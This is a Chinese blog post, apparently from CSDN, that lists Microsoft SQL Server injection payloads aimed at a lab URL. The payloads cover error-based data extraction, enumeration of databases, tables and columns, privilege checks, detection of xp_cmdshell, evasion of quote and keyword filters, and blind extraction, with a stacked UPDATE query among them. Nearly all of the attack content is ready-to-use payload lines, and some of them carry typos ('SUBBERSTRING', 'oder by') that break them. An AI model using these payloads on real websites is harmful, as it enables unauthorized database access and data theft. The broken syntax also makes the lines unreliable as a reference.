Common skills of SQL injection

最新推荐文章于 2024-07-22 16:40:11 发布
最新推荐文章于 2024-07-22 16:40:11 发布
阅读量1k 收藏
点赞数
分类专栏: 网络安全 文章标签: sql table vbscript insert user 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dislocation/article/details/611746
版权

A. 获取字符串数据
1.直接把字符串数据与数字比较,如"@@version"
and (select @@version)=0

2.用CONVERT或CAST把字符串转换为INT类型
http://192.168.175.9/sqli/search.asp?id=1 and CONVERT(int,@@version) > 0
http://192.168.175.9/sqli/search.asp?id=1 and CAST(int,@@version) > 0

3.用IN函数
http://192.168.175.9/sqli/search.asp?id=1 and 1 IN(select @@version)
http://192.168.175.9/sqli/search.asp?id=1 and (select @@version) in (1)

4.联合查询,数据类型不匹配。


B. 获取数字型数据
将函数返回值直接与一个数字进行比较,如相等则正常显示。
str(数字)+'@' > 数字
CAST(数字 as nvarchar)+'@'>数字
CONVERT(nvarchar,数字)+'@'>数字

http://192.168.175.9/sqli/search.asp?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'))
http://192.168.175.9/sqli/search.asp?id=1 and (select str(IS_SRVROLEMEMBER('sysadmin'))%2b'@')>0
http://192.168.175.9/sqli/search.asp?id=1 and (select CAST(IS_SRVROLEMEMBER('sysadmin') as nvarchar)%2b'@')>0
http://192.168.175.9/sqli/search.asp?id=1 and (select CONVERT(nvarchar,IS_SRVROLEMEMBER('sysadmin'))%2b'@')>0
注:需将IE选项的显示友好HTTP错误信息关掉,不报500错误消息。
注:IE可能会将"+"屏蔽掉,故用%2b替换。
注:IS_SRVROLEMEMBER函数可判断当前用户是否属于某一个组,返回INT类型。

C. 获取表中数据
按原始顺序读取第一条数据
select top 1 field_name from table_name
select top 1 field_name from table_name where field_name NOT IN('上条查询结果集')
按照原始顺序读第n条记录
select top 1 field_name from table_name where field_name NOT IN(select top N-1 field_name from table_name)
按照某种字段排序后,读取第N条记录
select top 1 field_name from table_name where field_name NOT IN(select top N-1 field_name from table_name oder by field_name) order by field_name
select top 1 field_name from (select top N field_name from table_name order by field_name DESC) as alias_name oder by field_name
把某字段进行从小到大排序
select min(field_name) from table_name
select min(field_name) from table_name where field_name > '上条查询结果'
利用游标
declare c cursor dynamic for select * from table_name
open c

D.获取数据库信息
获取数据版本
http://192.168.175.9/sqli/search.asp?id=1 and (select @@version)>0
获取当前数据名
http://192.168.175.9/sqli/search.asp?id=1 and db_name()>0
获取当前数据用户名
http://192.168.175.9/sqli/search.asp?id=1 and user>0
判断当前用户名是否是DB_OWNER
http://192.168.175.9/sqli/search.asp?id=1 and 1=(select IS_MEMBER('db_owner'))
获取所有库信息(要求有public权限)
http://192.168.175.9/sqli/search.asp?id=1 and (select  top 1 name from master.dbo.sysdatabases order by dbid)>0
http://192.168.175.9/sqli/search.asp?id=1 and (select  top 1 name from master.dbo.sysdatabases where name not in ('上条查询结果') order by dbid)>0
获取当前表名和表的字段名
http://192.168.175.9/sqli/search.asp?id=1 having 1=1
http://192.168.175.9/sqli/search.asp?id=1 group by 上条结果 having 1=1
枚举所有表名
http://192.168.175.9/sqli/search.asp?id=1 and (select top 1 name from sysobjects where xtype='U' order by id)>1
枚举所有字段名
http://192.168.175.9/sqli/search.asp?id=1 and (select top 1 name from syscolumns where id=(select id from sysobjects where name='table_name'))>1
获取字段内容
http://192.168.175.9/sqli/search.asp?id=1 and (select top 1 field_name1 from (select top N field_name1, field_name2 from [table_name] order by field_name2) as alias_name order by field_name2 DESC)>0
检测存储过程是否存在
http://192.168.175.9/sqli/search.asp?id=1 and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name ='xp_cmdshell')

E.单引号过滤
1. 用MSSQL中的char函数替换
'a'==char(97)==char(0x61)
2.用二进制字符串
g=0x6700,u=0x7500,e=0x6500,s=0x7300,t=0x7400
guest=0x67007500650073007400
3.利用数据中已有的字符串
利用事先注册用户名或密码字段
http://192.168.175.9/sqli/search.asp?id=1 and user=(select field_name1 from table_name where ID=x)

F.Keywords过滤,如select,insert
由于VBScript中Replace函数默认对大小写不敏感
可用sEeLct,iNSerT替代。

G.不显示错误信息
1.获取INT数据,先猜一个数字然后与之比较,二分法可快速找到。
2.获取字符串数据,可以把字符串拆开,然后猜测。
http://192.168.175.9/sqli/search.asp?id=1 and SUBBERSTRING(field_name,1,1)='a'
http://192.168.175.9/sqli/search.asp?id=1 and ASCII(SUBBERSTRING(field_name,1,1))=120
3.把获取的数据插入某张表中某个字段,要求对表结构较熟悉。
http://192.168.175.9/sqli/search.asp?id=1;update table_name set field_name1=db_name(),field_name2=xxx

dislocation
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
实战渗透浅谈-记一次应急渗透测试
qq_29437513的博客
12-24 3844
实战渗透浅谈-记一次应急渗透测试
mssql提权总结
st3pby的博客
12-30 2660
mssql提权总结
SQL注入(3)
qq_41007744的博客
05-04 468
SQL注入基于错误查询is_srvrolemember()是一个SQL Server T-SQL函数,返回值:1: 如果用户属于指定的组0: 如果用户不属于指定的组NULL: 如果指定的组不存在?id=12/is_srvrolemember('sysadmin') 如果用户属于sysadmin组,那么id参数等于12/1返回正常的页面case语句case when condition then a...
SQLServer数据库注入详解
热门推荐
谢公子的博客
06-28 2万+
目录 SQLServer数据库 修改默认1433端口 SQLServer数据库的管理 SQLServer数据库的查询语句 SA权限开启xp_cmdshell获取主机权限 SA权限使用sp_oacreate执行系统命令 DB_owner权限LOG备份Getshell DB_owner权限差异备份Getshell 盲注SQLServer数据库 SQLServer数据库 SQL S...
手工MSSQL注入常用SQL语句
weixin_34290390的博客
08-31 143
备用 and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(...
The Art of SQL
10-24
A database administrator may have some SQL skills and be able to tune an especially poorly performing statement. But developers are writing code that may well run for 5 to 10 years, surviving several...
泛微OA8前台sql注入1
08-08
在`getdata.jsp`页面,请求对象`request`直接被传递给`weaver.hrm.common.AjaxManager`的`getData`方法处理。 在`getData`方法内部,它检查`cmd`参数是否为空。如果非空,它会调用`proc`方法,该方法接收四个参数,...
Common SQL Environment ver1.60
04-27
这个小工具还是很好用的。是小日本写的。主要是免费。 相对的还是更喜欢SI Object Browser . 对于数据库查看操作等等工具都差不多,更希望有个能自动造数据的方便小工具,有待自己开发啦。 这里给出下载地址:
sqlserver驱动2012版
01-10
1. 支持最新的T-SQL扩展,如窗口函数和 Common Table Expressions (CTE)。 2. 提供高速的OLE DB和ODBC连接能力,支持并发事务和连接池。 3. 内置支持SQL Server的认证机制,包括Windows身份验证和混合模式(Windows ...
of_device_common.rar_The Common
09-19
Take the archdata values for IOMMU, STC, and HOSTDATA found in BUS and propagate to all child platform_device objects.
Sql Server中监视到的语句
weixin_30323961的博客
01-17 191
Sql Server中监视到的语句select is_srvrolemember('sysadmin') * 1 +is_srvrolemember('serveradmin') * 2 +is_srvrolemember('setupadmin') * 4 +is_srvrolemember('securityadmin') * 8 +is_srvrolemember('processad...
Sql server注入分类之语句总结
qq_42990434的博客
12-16 3118
关于mssql的注入语句,跟mysql也差不了多少,都是从information_scheam库中获取各种数据 基础语句 select ***://查询指令 @@version // 数据库版本 system_user //系统用户 suser_sname() //查出当前操作数据库的登入名,一般和触发器一起用来监控是谁对表做了操作 user //获取当前数据库用户名 db_name() // 当前数据库名 其中db_name(N)可以来遍历其他数据库
mysql数据库注入_MYSQL数据库注入总结
weixin_42554162的博客
01-19 263
MS SQL是指微软的SQLServer数据库服务器,它是一个数据库平台,提供数据库的从服务器到终端的完整的解决方案,其中数据库服务器部分,是一个数据库管理系统,用于建立、使用和维护数据库。SQLServer一开始并不是微软自己研发的产品,而是当时为了要和IBM竞争时,与Sybase合作所产生的,其最早的发展者是Sybase,同时微软也和Sybase合作过SQL Server 4.2版本的研发,微...
在边界路由器上手动关闭服务配置
dislocation的专栏
05-24 1139
Router(config)# no cdp runRouter(config)# no service tcp-small-serversRouter(config)# no service udp-small-servesRouter(config)# no ip fingeRouter(config)# no ip identdRouter(config)# no i
ASP防SQL Injection方法
dislocation的专栏
03-06 930
 原以为SQL注入已经是过时的话题,最近工作上发现许多网站还是存在着这方面的漏洞。不少网管对“‘”和关键字过滤,对于网上流行的一些SQL注入工具还是毫无作用。看来老话题还得重谈,SQL注入还需要更多的关注。 通常判断网站是否存在SQL注入漏洞,可以通过下面3种方法。1.数字型 "select * from table_name where field_name=1"1 and
SQL Server内置的HTAP技术
2401_85789772的博客
07-22 615
假设用户建了一个行存索引和列存索引组合的表,事务插入数据时,会同时插入行存和Delta Store,Delta Store达到100W行阈值后冻结,tuple-mover后台线程会将其中较冷的数据迁移到Main Store,无论是过去的传统数仓,还是现在的大数据技术栈,都存在这个时效性问题。根据数仓场景的特点,SQL Server列存的开销其实可以接受,然后使用类Delta-Main架构也是比较主流的做法,但是到了HTAP的场景,整个数据库需要支撑高并发的查询和更新,列存的开销就会被放大。
前台文本直接取数据库值doFieldSQL插入SQL
qq_34276316的博客
07-22 266
实现功能:根据选择的车间主任带出角色。
SQL injection UNION attacks SQL注入联合查询攻击
最新发布
jamesP777的博客
07-22 331
通过使用UNION关键字,拼接新的SQL语句从而获得额外的内容,例如select a,b FROM table1 UNION select c,d FROM table2,可以一次性查询 2行数据,一行是a,b,一行是c,d。
sql injection
03-29
SQL injection attacks are one of the most common types of web application attacks, and they can have severe consequences for individuals and organizations. To prevent SQL injection attacks, ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值